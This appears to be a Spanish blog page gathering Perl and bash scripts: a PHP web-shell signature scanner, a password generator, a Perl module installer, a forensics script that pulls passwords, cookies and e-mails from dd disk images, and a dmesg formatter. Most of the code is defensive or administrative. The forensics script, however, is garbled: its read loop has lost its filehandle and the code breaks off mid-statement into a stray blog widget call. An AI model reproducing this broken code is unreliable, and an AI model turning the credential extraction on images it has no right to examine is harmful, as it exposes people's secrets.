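my $embedded_re = qr/(\<\?php|include(\ |\())/i;

find(\&backdoor, "$folder");

# File::Find callback: score one file and report it when it looks like a
# PHP web shell.
#   $_                 file name within the current directory (set by find)
#   $File::Find::name  path used in the report
# This is a signature scan: obfuscated or renamed shells will not match and
# ordinary admin code can, so treat hits as leads to review, not verdicts.
# File names come from the scanned tree and are printed unescaped.
sub backdoor {
    my $entry = $_;
    return unless (-f $entry);

    # Extension checks are case-insensitive so that names such as X.PHP are
    # scanned as well.
    if ($entry =~ /\.(php|txt)/i) {
       # Three-argument open with a real check.  The old "open(...) || die"
       # bound || to the file-name string, so failures were never noticed.
       # An unreadable file is reported and skipped rather than ending the
       # whole scan.
       my $IN;
       unless (open($IN, '<', $entry)) {
           warn "can not open datei $File::Find::name: $!\n";
           return;
       }
       # Count matching lines while streaming instead of slurping the file.
       my $score = 0;
       my $tempscore = 0;
       while (my $row = <$IN>) {
           $score++     if ($row =~ $maybe_re);
           $tempscore++ if ($row =~ $probably_re);
       }
       close $IN;
       $score +=  50 *  $tempscore;
       print "$score - Possible backdoor : $File::Find::name\n" if ($score > $sens-1 );
  }elsif ($entry =~ /\.(jpg|jpeg|gif|png|tar|zip|gz|rar|pdf)/i) {
       my $IN;
       unless (open($IN, '<', $entry)) {
           warn "can not open datei $File::Find::name: $!\n";
           return;
       }
       # Stop at the first hit; one is enough to flag the file.
       my $found = 0;
       while (my $row = <$IN>) {
           if ($row =~ $embedded_re) {
               $found = 1;
               last;
           }
       }
       close $IN;
       print "5000 - Possible backdoor (php in non-php file): $File::Find::name\n" if ($found);
  }
}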
Permisos: chmod 700 findshell.pl 
Ejecución: ./findshell.pl [ sensibilidad del escaneo 1-50 ] [ directorio a escanear ]

Generador de Passwords

Nombre: Password.pl
Autor: George Shaffer [ gshaffe[at]erols.com ]
Descripción: Script que genera claves seguras de usuario, fáciles de recordar pero difíciles de romper
Visto en Roth Consulting
#!/usr/bin/perl -w
# Copyright 2000 George Shaffer (gshaffer@erols.com)
# Anyone may use or modify this code for any purpose PROVIDED
# that as long as it is recognizably derived from this code,
# that the copyright notice, this comment and the immediately
# following comments on passwords remain intact and unchanged.
# No warrantees of any kind are expressed or implied.

# Please feel free to change anything from this point forward.

# I experimented at considerable length to find seed logic that
# was very random on Windows NT which generates a very small
# universe of process ID numbers ($$) compared to Unix.  
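srand(time() ^ ($$ + $$ << 21));

# Review note: the seed above is now used only as a fallback.  A seed built
# from the clock and the process ID can be guessed by anyone who knows
# roughly when the script ran, and rand() is not a cryptographic generator,
# so random choices are taken from the kernel CSPRNG whenever /dev/urandom
# can be opened.
my $urandom;
my $haveUrandom = open($urandom, '<', '/dev/urandom') ? 1 : 0;
if ($haveUrandom) {
    binmode($urandom);
} else {
    warn "WARNING: /dev/urandom is unavailable; falling back to rand(), "
       . "whose output is predictable. Do not rely on these passwords.\n";
}

# Return a uniformly distributed integer in 0 .. $limit-1.
# Reads 16 bits at a time and rejects values in the incomplete top range so
# the modulo does not favour the low indexes.
sub randomBelow {
    my ($limit) = @_;
    return 0 if ($limit < 1);
    return int(rand($limit)) unless ($haveUrandom);
    my $ceiling = 65536 - (65536 % $limit);
    while (1) {
        my $raw;
        my $got = read($urandom, $raw, 2);
        die "Short read from /dev/urandom\n" unless (defined($got) && $got == 2);
        my $value = unpack('n', $raw);
        return $value % $limit if ($value < $ceiling);
    }
}

# USER CHANGEABLE CONSTANTS FOLLOW

# Change $howMany to change the number of generated passwords.
$howMany = 10;

# Increase the default 7 to change the generated password size
# and extra letters will be added to the end.  Decrease and
# you'll lose some or all of the second string of letters.
# Depending on the value of $addConsonants the actual 
# password length may range from $siz to $siz + 2.
# Size interacts with other choices.  If $addConsonants is false
# size will be fixed length and is achieved by truncation after
# checking for upper case and digits so short sizes (3 - 5) may
# not have the variability you desire.
$siz = 7;
# A $siz less than 3 creates an endless loop.
$siz = 3 if ($siz < 3);

# Change $addConsonats to 0 to prevent some extra consonants
# from being tacked on to letter sequences.  Leave $addConsonants
# at 1 to sometimes add an extra consonant to letter sequences.
# If left at 1 the password size will vary from $siz to $siz+2.
$addConsonants = 1;

# Change $firstUpper to 0 to prevent the first character of each
# letter sequence from being upper case.  Leave it as 1 if you
# want some of the first characters to be upper case.
$firstUpper = 1;

# Change $mixedCase to 1 to mix the case of all letters.
# $mixedCase is not random as subsequent checks force at
# least one upper and one lower case letter in each password.
# Leave it at 0 so all letters will be lower case or only
# the first or each letter sequence may  be upper case.
$mixedCase = 0;

# By changing $symbolOdds from 0 to 10 you change the likelihood
# of having two numbers or a number and a symbol.  At 0 you will
# always get 2 digits.  At 1 you will usually only get one digit
# but will sometimes get a second digit or a symbol.  At 10 you 
# will always get two numbers or a number and a symbol with the 
# about even chances that one of the two characters will be a 
# symbol.  The odds are affected by what characters are added to 
# or removed from the $sym initialization string.  
# The default is 7.
$symbolOdds = 7;

# Change $across to a 1 to print passwords across the screen.
# Leave $across as a 0 to print a single column down the screen. 
$across = 0;

# Add or remove symbols to make passwords easier or harder
# to type.  Delete the second set of digits to increase
# the relative frequency of symbols and punctuation.
# Add some vowels or consonants to really change the patterns
# but these will also get much harder to remember.
# If you change the symbol list you need to change the matching
# regular expression near the bottom of the program.
# Review note: single quotes are required here.  Inside double quotes "$%"
# is interpolated as a Perl variable, which silently replaced those two
# symbols in the set.
$sym = '~`!@#$%^&*()-_+=,.<>';
$numb = "12345678901234567890" . $sym;
$lnumb = length($numb);


# USER CHANGEABLE CONSTANTS END - Changing the constants as
# specified above has been fairly well tested.  Any changes
# below here and you are changing the logic of the program.
# You should be familiar with programming if you make changes
# after this point.

# Unless you plan to change the logic in the loop below,
# leave this next alone and control case with $firstUpper and
# $mixedCase above.  $mixedCase supercedes if both are true.
$upr = "BCDFGHJKLMNPQRSTVWXYZbcdfghjklmnpqrstvwxyz";
$cons = "bcdfghjklmnpqrstvwxyz";
if ($mixedCase) {
    $vowel = "AEIOUaeiou";
    $cons = $upr;
} else {
    $vowel = "aeiou";
}
$upr = $cons unless ($firstUpper);
$lvowel = length($vowel);
$lcons = length($cons);
$lupr = length($upr);

$realSize = $siz;
$realSize += 2 if ($addConsonants);
($across) ? ($down = "  ") : ($down = "\n");
$linelen = 0;

# Review note: the bound is "<" so that exactly $howMany passwords are
# printed; with "<=" the default of 10 produced 11.
for ($j=0; $j<$howMany; $j++) {
   $pass = "";
   $k = 0;
   for ($i=0; $i<=$siz; $i++) {
      # The basic password structure is cvc99cvc.  Depending on
      # how $cons and $upr have been initialized above case will
      # be all lower, first upper or random.
      if ($i==0 or $i==2 or $i==5 or $i==7) {
         if ($i==0 or $i==5) {
            $pass .= substr($upr,randomBelow($lupr),1);
         } else {
            $pass .= substr($cons,randomBelow($lcons),1);
         }
         # The next will conditionally add up to 2 consonants
         # pseudo randomly after the four "standard" consonants.
         if ($addConsonants and (randomBelow(4) == 3) and $k < 2) {
            $pass .= substr($cons,randomBelow($lcons),1);
            $k++;
         }
      }

      # Pad the password with letters if $siz is over 7.
      if ($i > 7) {
          if (randomBelow(26) <= 5) {
             $pass .= substr($vowel,randomBelow($lvowel),1);
          } else {
             $pass .= substr($cons,randomBelow($lcons),1);
          }
      }

      # Put the vowels in cvc99cvc.  Case depends on how $vowel
      # was initialized above.
      $pass .= substr($vowel,randomBelow($lvowel),1) 
         if ($i==1 or $i==6);

      # Change $symbolOdds initialization above to affect the
      # number of numbers and symbols and their ratio.
      if ($i==3 or $i==4) {
         # If $symbolOdds is non zero take any character
         # from the $numb string which has digits, symbols
         # and punctuation.
         if ($symbolOdds) {
            $pass .= substr($numb,randomBelow($lnumb),1) 
               if (randomBelow(10) <= $symbolOdds);
         } else {
            # If $symbolOdds is zero keep trying until a
            # a digit is found.
            $n = "";
            until ($n =~ /[0-9]/) {
               $n = substr($numb,randomBelow($lnumb),1);
            }
            $pass .= $n;
         }
      }
   }

   # Plan to use this password unless . . .
   $skipThisOne = 0;
   # Don't include two consecutive symbols or puntuation.
   # Review note: "$" and "@" are escaped so the class matches them literally.
   $skipThisOne = 1 if ($pass =~ /[~`!\@#\$%^&*()\-_+=,.<>]{2}/);
   # Include at least one digit.
   $skipThisOne = 1 unless ($pass =~ /[0-9]/);
   # Include at least one lower case letter.
   $skipThisOne = 1 unless ($pass =~ /[a-z]/);
   # Conditionally insure at least one upper case character.
   $skipThisOne = 1 
      if (!($pass =~ /[A-Z]/) and ($firstUpper or $mixedCase));
   # If any test fails get another password.
   if ($skipThisOne) {
      $j--;
      next;
   }

   # Check the password length.
   $pass = substr($pass,0,$realSize) if (length($pass) > $realSize);

   # Print the passwords in a single column or across
   # the screen based on $down which is set based on the
   # the value of $across.
   if ($down ne "\n") {
      # Don't wrap passwords or trailing whitespace.
      if ($linelen + length($pass) + length($down) > 79) {
         print "\n";
         $linelen = 0;
      }
      $linelen += length($pass) + length($down);
   }
   print "$pass$down";
}
# Be sure to end the last line with an end of line.
print "\n" if $down ne "\n";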
Asignamos permiso de ejecución: chmod +x Password.pl 
Ejecutamos el Script: ./Password.pl

Script para instalar paquetes en Perl

Autor: @Desconocido
Descripción: Script que nos permite instalar paquetes Perl

#!/bin/bash
# Script para instalar paquetes en Perl.
 
# Read a single keypress from the terminal without echoing it.
# The key is left in the global variable "look"; the terminal settings saved
# in OLD_STTY are restored afterwards.
function getch()
{
 OLD_STTY=$(stty -g)
 stty cbreak -echo
 look=$(dd if=/dev/tty bs=1 count=1 2>/dev/null)
 stty "$OLD_STTY"
}
 
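# Build, test and install the module in the current directory.
# Returns non-zero as soon as one step fails.
#
# Only "make install" needs root.  Makefile.PL, the build and the test suite
# are code shipped inside the archive, so they run as the invoking user; the
# previous version ran all of them through sudo and carried on after a
# failed step.
function installModule()
{
 perl Makefile.PL &&
 make &&
 make test &&
 sudo make install
}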
 
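# Let the user pick one of the *.tar.gz archives in the current directory,
# unpack it and install it with installModule.
#
# Installing a module executes code from the archive, so only use archives
# obtained from a source you trust and whose checksum you have verified.
# The archive is assumed to unpack into a directory named after the file
# without its ".tar.gz" suffix.
function modins()
{
 local directorio
 archivo=
 select archivo in *.tar.gz "SALIR"
 do
  if [ "${archivo}" = "SALIR" ]
  then

   exit 0;

  elif [[ -n "${archivo}" ]]
  then

   echo -e "Elegiste : ${archivo}";
   tar zxvf "${archivo}" &> /dev/null || {
    echo -e "Error descomprimiendo [ ${archivo} ]";
    exit 1;
   }

   # Same name for the cd and for its error message; the old message cut
   # the name at the first dot and so showed a different directory.
   directorio="${archivo%.tar.gz}"
   cd -- "${directorio}" 2> /dev/null || {
       echo -e "\aError abriendo directorio ${directorio}";
       exit 1;
      }

   # Do not claim success when a build, test or install step failed.
   installModule || {
    echo -e "Error instalando [ ${archivo} ]";
    exit 1;
   }

   echo -e "\E[31;47mMódulo instalado. Presione una tecla para continuar.";
   tput sgr0;
   getch;
   break;

  else

   # An invalid menu choice is an error, so report it in the exit status.
   echo -e "Error eligiendo archivo.";
   exit 1;

  fi

 done
}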
 
# Entry point: run the interactive installer once, then finish successfully.
modins
exit 0

Introducción a la informática forense con Perl

Autor: @Xianur0
Para saber mas sobre el script click Aquí
Correo: xianur0.null[at]gmail.com
Descripción: Script en Perl que permite realizar un análisis forense a partir de una imagen dd
#!/usr/bin/perl
# By Xianur0
# xianur0.null[at]gmail.com
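# Path of the dd image to analyse.  The usage message names the script with
# $0; the original used $1, which is empty at this point.
$imagen = $ARGV[0] || die("Uso: $0 imagen.dd\n");

# Three-argument, read-only open with an explicit check: the two-argument
# form lets characters in the file name select the open mode, and an
# unchecked failure would produce empty result files.  Work on a copy of the
# evidence and record its hash before and after the run.
open(BIN, '<', $imagen) || die("No se pudo abrir $imagen: $!\n");
binmode(BIN);

# De-duplication tables, one per artefact type (value = times seen).
my %uris = ();
my %disks = ();
my %bookmarks = ();
my %cookies = ();
my %emails = ();
my %volumenes = ();
my %mysqls = ();
my %proxys = ();
# State for the bookmark that is currently being assembled.
my $bookmark = "";
my $nbookmark = "";
my @lineas = ();
my $lineabin = "";
# Strings within this length range are written to the candidate-password list.
my $minpass = 5;
my $maxpass = 20;
my $todo = "";
my $grabar = 0;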
# Replace every "@NN@" token (NN = exactly two decimal digits) with the
# character whose code is NN, and return the resulting string.
sub ascii2char($)
{
	my ($texto) = @_;
	$texto =~ s/@([0-9]{2})@/chr($1)/eg;
	return $texto;
}
# Replace every pair of hexadecimal digits with the character it encodes and
# return the resulting string; other characters are left as they are.
sub hex2ascii($)
{
	my ($texto) = @_;
	$texto =~ s/([a-fA-F0-9]{2})/chr(hex $1)/eg;
	return $texto;
}
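# The result files hold recovered credentials, cookies and e-mail addresses,
# so create them readable by the examiner only.
umask(077);

# Every open is checked: previously a missing "resultados" directory made all
# of them fail silently and the findings were discarded.
unless (-d "resultados") {
	mkdir("resultados") || die("No se pudo crear el directorio resultados: $!\n");
}

# Handle name => output file.  The handles stay package filehandles because
# the extraction loop prints to them by name.
my @salidas = (
	[ "PASSWORD",  "passwords.txt"  ],
	[ "MYSQL",     "mysql.txt"      ],
	[ "URI",       "uri.txt"        ],
	[ "COOKIE",    "cookies.txt"    ],
	[ "BOOKMARKS", "bookmarks.txt"  ],
	[ "VOLUMEN",   "volumenes.txt"  ],
	[ "DISK",      "disks.txt"      ],
	[ "EMAIL",     "emails.txt"     ],
	[ "PROXY",     "proxys.txt"     ],
	[ "ENCRYPTED", "encrypted.txt"  ],
	[ "BRUTE",     "bruteforce.txt" ],
	[ "STRINGS",   "strings.txt"    ],
);
foreach my $salida (@salidas) {
	my ($manejador, $archivo) = @$salida;
	# A string in the handle position names the package filehandle to open.
	open($manejador, '>', "resultados/$archivo")
		|| die("No se pudo crear resultados/$archivo: $!\n");
}
print "Extrayendo datos...\n";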
while($lineabin = ) {
	@lineas = ($lineabin =~ m/([\w\d&\*<>=\-\_\[\]\s"'\/\\\%;\:\.\t\,\#\)\(\@\?\0`]+)/g);
	BUCLE: foreach $linea (@lineas) {
		$linea =~ s/\0//g;
		next BUCLE if(length($linea) < 4);
		print STRINGS $linea."\n";
		if(length($linea) >= $minpass && length($linea) <= $maxpass && $linea !~ /^(\s|\t)+$/) {
			print BRUTE $linea."\n";
		}
		if($nbookmark ne "") {
			if($linea =~ /(<|>)/) {
				$bookmark .= $linea;
			} else {
				$bookmarks{$nbookmark} = $bookmark;
				$nbookmark = "";
				$bookmark = "";
			}
		}
		if($linea =~ /((https?|file|ftp|smb):\/\/.+)/) {
			my $uri = $1;
			$uri =~ s/\s+.+//g;
			print URI $uri."\n" if($uris{$uri} < 1 || $uris{$uri} eq "");
			$uris{$uri}++;
		}
		if($linea =~ /(\/dev\/disk\/by-id\/(.+))/) {
			my $disk = $1;
			print DISK $disk."\n" if($disks{$disk} < 1 || $disks{$disk} eq "");
			$disks{$disk}++;
		}
		if($linea =~ /<\/?bookmark(\shref=[^>]+)?>/) {
			if($nbookmark ne "") {
				print BOOKMARKS $bookmark."\n" if($bookmarks{$nbookmark} < 1 || $bookmarks{$nbookmark} eq "");
				$bookmarks{$nbookmark}++;
				$nbookmark = "";
				$bookmark = "";
			}
			elsif($linea =~ /createSummaryAndThumb("summary815538149022121675");

dmesg más fácil de leer

Autor: Linuxaria.com
Descripción: Script que hace más amigable la salida del comando dmesg.

#!/usr/bin/perl

use strict;
use warnings;

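my @dmesg_new = ();
my $dmesg = "/bin/dmesg";
# NOTE(review): on systems that restrict the kernel log to privileged users
# this returns nothing for an ordinary account; confirm on the target host.
my @dmesg_old = `$dmesg`;
my $now = time();

# Whole seconds since boot, read straight from /proc/uptime instead of going
# through a "cat | cut" shell pipeline.  Stop with a clear message when the
# value cannot be read, rather than printing wrong dates.
my $uptime;
if (open(my $uptime_fh, '<', '/proc/uptime')) {
    my $first = <$uptime_fh>;
    close($uptime_fh);
    if (defined($first) && $first =~ /^(\d+)/) {
        $uptime = $1;
    }
}
die "Cannot read the uptime from /proc/uptime\n" unless defined $uptime;

# Epoch time of boot.  Converted timestamps are approximate: they drift if
# the clock was changed or the machine was suspended since boot, so do not
# use them alone to order events against other logs.
my $t_now = $now - $uptime;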

# Format an epoch time as "YYYY-MM-DD HH:MM:SS" in the local time zone.
#   $_[0]  seconds since the epoch
sub format_time {
my ($sec, $min, $hour, $mday, $mon, $year) = localtime $_[0];
# localtime counts months from 0 and years from 1900.
return sprintf '%4i-%02i-%02i %02i:%02i:%02i',
    $year + 1900, $mon + 1, $mday, $hour, $min, $sec;
}

# Rewrite each "[seconds.fraction] message" line with a wall-clock time.
# Lines that do not carry a bracketed timestamp are left out of the output.
for my $line (@dmesg_old) {
chomp $line;
next unless $line =~ m/\[\s*(\d+)\.(\d+)\](.*)/i;
my ($seconds, $message) = ($1, $3);
# boot time + seconds since boot
my $stamp = format_time($t_now + $seconds);
push @dmesg_new, "[" . $stamp . "] " . $message;
}

print join("\n", @dmesg_new), "\n";